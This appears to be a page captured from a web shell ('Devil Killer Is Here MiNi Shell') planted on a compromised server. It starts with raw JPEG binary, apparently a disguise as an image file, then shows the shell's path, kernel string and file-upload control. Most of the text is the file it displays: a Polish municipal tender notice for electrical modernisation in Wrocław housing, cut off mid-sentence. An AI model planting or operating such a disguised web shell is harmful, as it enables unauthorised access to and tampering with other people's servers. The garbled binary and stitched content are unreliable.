JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240614/0036769801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> WM/SZP/TP/16/2024/G_Modernizacja instalacji elektrycznej ze zmianą sposobu ogrzewania wraz z demontażem pieców kaflowych w mieszkaniach gminnych zarządzanych przez Wrocławskie Mieszkania Sp. z o.o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wrocławskie Mieszkania Sp. z o. o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 020610504</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Namysłowska 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-304</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@wm.wroc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wm.wroc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Modernizacja instalacji elektrycznej ze zmianą sposobu ogrzewania wraz z demontażem pieców kaflowych w wyznaczonych mieszkaniach gminnych zarządzanych przez Wrocławskie Mieszkania Sp. z o.o., znak postępowania: WM/SZP/TP/16/2024/G</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 020610504</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Namysłowska 8</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">50-304</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamowienia@wm.wroc.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.wm.wroc.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WM/SZP/TP/16/2024/G_Modernizacja instalacji elektrycznej ze zmianą sposobu ogrzewania wraz z demontażem pieców kaflowych w mieszkaniach gminnych zarządzanych przez Wrocławskie Mieszkania Sp. z o.o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-04e11cc1-2a1b-11ef-b373-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00367698</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wm-wroc.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://wm-wroc.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne, które muszą<br/>spełniać urządzenia informatyczne w celu korzystania z Platformy:<br/>1) Specyfikacja połączenia<br/>Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy Przetargowej Wrocławskie Mieszkania Sp.<br/>z o.o.:<br/>https://wm-wroc.logintrade.net/rejestracja/ustawowe.html.<br/>Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat<br/>SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej<br/>Wrocławskie Mieszkania Sp. z o.o. ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności<br/>pozwalających na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy użyciu Platformy Przetargowej Wrocławskie Mieszkania Sp. z o.o.:<br/>Dopuszczalne przeglądarki internetowe:<br/>• Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>• Google Chrome 31<br/>• Mozilla Firefox 26<br/>• Opera 18<br/>Pozostałe wymagania techniczne:<br/>• dostęp do sieci Internet<br/>• obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax<br/>• włączona obsługa JavaScript<br/>• zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>• zainstalowany Acrobat Reader<br/>• zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/>2) Dopuszczalne formaty przesyłanych danych<br/>Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach danych<br/>określonych w przepisach wydanych na podstawie §2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452).<br/>Równocześnie Zamawiający rekomenduje na format danych przesyłanych plików: .pdf.<br/>3) Kodowanie i oznaczanie czasu przekazania danych<br/>Czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS. Czas przekazania danych jest to czas, w którym zostanie potwierdzone<br/>złożenie oferty, dokumentu przez Wykonawcę. W przypadku wybrania opcji złożenia oferty bez logowania, potwierdzenie odbywa się<br/>poprzez kliknięcie w link dostępny w wiadomości mailowej, wysłanej automatycznie po złożeniu oferty, dokumentu będąc<br/>niezalogowanym na Platformie przetargowej. Wiadomość otrzymuje Wykonawca na adres e-mail wskazany w formularzu w ikonę<br/>„Złóż ofertę”. W przypadku Wykonawcy zalogowanego na Platformie Przetargowej, czas przekazania danych jest to czas wysłania<br/>dokumentu, oferty przez Platformę Przetargową.<br/>4) Korzystanie z platformy przetargowej jest bezpłatne.<br/>Pełną obsługę techniczną platformy przetargowej świadczy firma Logintrade S.A. W przypadku ewentualnych problemów technicznych prosimy o kontakt z infolinią techniczną +48 71 787 35 34 (w dni robocze godz. 8.00-16.00); e-mail:<br/>helpdesk@logintrade.net<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego zobowiązany jest zapoznać się z:<br/>Instrukcjami obsługi Platformy przetargowej – dostępnymi pod adresem:<br/>https://wm-wroc.logintrade.net/rejestracja/instrukcje.html<br/>Regulaminem korzystania z Platformy przetargowej – dostępnym pod adresem:<br/>https://wm-wroc.logintrade.net/rejestracja/regulamin.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny opisany w SWZ rodził XVIII</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WM/SZP/TP/16/2024/G</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1, Modernizacja instalacji elektrycznej ze zmianą sposobu ogrzewania wraz z demontażem pieców kaflowych w wyznaczonych mieszkaniach gminnych zarządzanych przez Wrocławskie Mieszkania Sp. z o.o. Szczegółowy opis przedmiotu zamówienia i obowiązki stron określają: <br/>a)	projektowane postanowieniach umowy ( załącznik nr 4 do SWZ), <br/>b)	Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych ( załącznik nr 3a do SWZ),<br/>c)	przedmiary robót ( załącznik nr 3b do SWZ) dla trzech typów mieszkań M1 , M2, M3. Typ mieszkania M1-21 lokali , Typ mieszkania M2-21 lokali, Typ mieszkania M3-9 lokali. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45315000-8 - Instalowanie urządzeń elektrycznego ogrzewania i innego sprzętu elektrycznego w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana w oparciu o kryteria określone w rozdz. XVII SWZ.<br/>Oferty zostaną ocenione przez Zamawiającego na podstawie następujących kryteriów:<br/>1) Cena oferty brutto (C)<br/>Kryterium „Cena oferty brutto” – wskaźnik „C”, ranga (znaczenie): 60 pkt - kryterium rozpatrywane będzie na podstawie ceny brutto<br/>za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Formularzu oferty.<br/>Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej ofercie zostanie przyporządkowana liczba punktów<br/>proporcjonalnie mniejsza, według poniższego wzoru (z dokładnością do dwóch miejsc po przecinku):<br/>C=Cena oferty najkorzystniejsze (Cn)x 60 pkt/Cena oferty badanej (Cb)<br/>C – liczba punktów oferty badanej za kryterium ceny, Cn – najniższa cena brutto oferowana spośród wszystkich złożonych ofert, Cb - cena brutto badanej oferty 60 pkt - waga (znaczenie) kryterium.<br/>2) Wydłużenie okresu gwarancji na roboty budowlane (G)<br/>Zamawiający ustala minimalny wymagany okres gwarancji na roboty budowlane objęte przedmiotem zamówienia na 36 miesięcy, licząc od dnia następnego po zakończeniu odbioru końcowego robót. Zamawiający przyzna punkty w następujący sposób:<br/>-brak wydłużenia okresu gwarancji - 0 pkt.<br/>-gwarancja dłuższa o 6 miesięcy - 10 pkt.<br/>-gwarancja dłuższa o 12 miesięcy - 20 pkt.<br/>-gwarancja dłuższa o 18 miesięcy - 30 pkt.<br/>-gwarancja dłuższa o 24 miesięcy - 35 pkt.<br/>Kryterium rozpatrywane będzie na podstawie zadeklarowanego - podanego w formularzu wydłużenia okresu gwarancji na roboty budowlane. <br/>Maksymalnie Wykonawca w tym kryterium może otrzymać 35 punktów.<br/>W przypadku, gdy Wykonawca w formularzu oferty nie wskaże „wydłużenia okresu gwarancji na roboty budowlane”, Zamawiający przyjmie, że wydłużenie okresu gwarancji na roboty budowlane wynosi 0 miesięcy i przyzna Wykonawcy „0” punktów. <br/>W przypadku, gdy Wykonawca zaoferuje wydłużenie okresu gwarancji na roboty budowlane dłuższe niż 24 miesiące Zamawiający do wyliczenia punktów przyjmie wydłużenie okresu gwarancji w wysokości 24 miesiące, natomiast do umowy zostanie wpisany okres gwarancji z uwzględnieniem wydłużenia wskazanym przez Wykonawcę w formularzu oferty.<br/>W przypadku wpisania przez Wykonawcę przedziału ilości miesięcy Zamawiający przyjmie do obliczenia punktów oraz do zawieranej umowy najwyższą liczbę wpisanego przedziału.<br/>3)	Kryterium społeczne (S) - waga (znaczenie) 5 pkt<br/> Zatrudnienie przy realizacji zamówienia, w części dotyczącej robót budowlanych ,nieprzerwalnie przez cały okres wykonywania robót budowlanych, osób bezrobotnych na podstawie stosunku pracy zgodnie z przepisami Kodeksu pracy w wymiarze minimum ¼ etatu lub umowy cywilnoprawnej. <br/>Za zatrudnienie 1 lub więcej osób bezrobotnych Wykonawca może otrzymać maksymalnie 5 pkt.<br/>Deklaracja zatrudnienia osób bezrobotnych przez Wykonawcę zawarta w ofercie (w formularzu ofertowym) zostanie oceniona w następujący sposób:<br/>Niezatrudnienie żadnej osoby bezrobotnej – 0 pkt.<br/>Zatrudnienie 1 osoby bezrobotnej – 2,5 pkt.<br/>Zatrudnienie więcej niż 1 osoby bezrobotnej – 5 pkt.<br/>W przypadku, gdy Wykonawca nie wskaże w ofercie ilości osób, o których mowa powyżej Zamawiający przyjmie ilość osób 0 i przyzna 0 pkt w tym kryterium.<br/>Kryterium rozpatrywane będzie na podstawie zadeklarowanego - podanego w formularzu, zatrudnia nieprzerwalnie przez cały jego okres bezrobotnych. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L = C + S + G<br/>C - ilość punktów za cenę oferty brutto, S – ilość punktów za kryterium społeczne, G - ilość punktów za wydłużenie okresu gwarancji na roboty budowlane, <br/>Za najkorzystniejszą ofertę zostanie uznana ta, która uzyska największą łączną liczbę punktów w ww. kryteriach.<br/>Ocena punktowa będzie dotyczyć ofert niepodlegających odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji na roboty budowlane (G) powyżej wymaganego przez Zamawiającego okresu minimalnego wynoszącego 36 miesięcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium społeczne (S) tj. zatrudnienie do realizacji zamówienia bezrobotnych w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2, Modernizacja instalacji elektrycznej ze zmianą sposobu ogrzewania wraz z demontażem pieców kaflowych w wyznaczonych mieszkaniach gminnych zarządzanych przez Wrocławskie Mieszkania Sp. z o.o. Szczegółowy opis przedmiotu zamówienia i obowiązki stron określają: <br/>a)	projektowane postanowieniach umowy ( załącznik nr 4 do SWZ), <br/>b)	Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych ( załącznik nr 3a do SWZ),<br/>c)	przedmiary robót ( załącznik nr 3b do SWZ) dla trzech typów mieszkań M1, M2, M3. Typ mieszkania M1-21 lokali , Typ mieszkania M2-21 lokali, Typ mieszkania M3-9 lokali. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45315000-8 - Instalowanie urządzeń elektrycznego ogrzewania i innego sprzętu elektrycznego w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana w oparciu o kryteria określone w rozdz. XVII SWZ.<br/>Oferty zostaną ocenione przez Zamawiającego na podstawie następujących kryteriów:<br/>1) Cena oferty brutto (C)<br/>Kryterium „Cena oferty brutto” – wskaźnik „C”, ranga (znaczenie): 60 pkt - kryterium rozpatrywane będzie na podstawie ceny brutto<br/>za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Formularzu oferty.<br/>Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej ofercie zostanie przyporządkowana liczba punktów<br/>proporcjonalnie mniejsza, według poniższego wzoru (z dokładnością do dwóch miejsc po przecinku):<br/>C=Cena oferty najkorzystniejsze (Cn)x 60 pkt/Cena oferty badanej (Cb)<br/>C – liczba punktów oferty badanej za kryterium ceny, Cn – najniższa cena brutto oferowana spośród wszystkich złożonych ofert, Cb - cena brutto badanej oferty 60 pkt - waga (znaczenie) kryterium.<br/>2) Wydłużenie okresu gwarancji na roboty budowlane (G)<br/>Zamawiający ustala minimalny wymagany okres gwarancji na roboty budowlane objęte przedmiotem zamówienia na 36 miesięcy, licząc od dnia następnego po zakończeniu odbioru końcowego robót. Zamawiający przyzna punkty w następujący sposób:<br/>-brak wydłużenia okresu gwarancji - 0 pkt.<br/>-gwarancja dłuższa o 6 miesięcy - 10 pkt.<br/>-gwarancja dłuższa o 12 miesięcy - 20 pkt.<br/>-gwarancja dłuższa o 18 miesięcy - 30 pkt.<br/>-gwarancja dłuższa o 24 miesięcy - 35 pkt.<br/>Kryterium rozpatrywane będzie na podstawie zadeklarowanego - podanego w formularzu wydłużenia okresu gwarancji na roboty budowlane. <br/>Maksymalnie Wykonawca w tym kryterium może otrzymać 35 punktów.<br/>W przypadku, gdy Wykonawca w formularzu oferty nie wskaże „wydłużenia okresu gwarancji na roboty budowlane”, Zamawiający przyjmie, że wydłużenie okresu gwarancji na roboty budowlane wynosi 0 miesięcy i przyzna Wykonawcy „0” punktów. <br/>W przypadku, gdy Wykonawca zaoferuje wydłużenie okresu gwarancji na roboty budowlane dłuższe niż 24 miesiące Zamawiający do wyliczenia punktów przyjmie wydłużenie okresu gwarancji w wysokości 24 miesiące, natomiast do umowy zostanie wpisany okres gwarancji z uwzględnieniem wydłużenia wskazanym przez Wykonawcę w formularzu oferty.<br/>W przypadku wpisania przez Wykonawcę przedziału ilości miesięcy Zamawiający przyjmie do 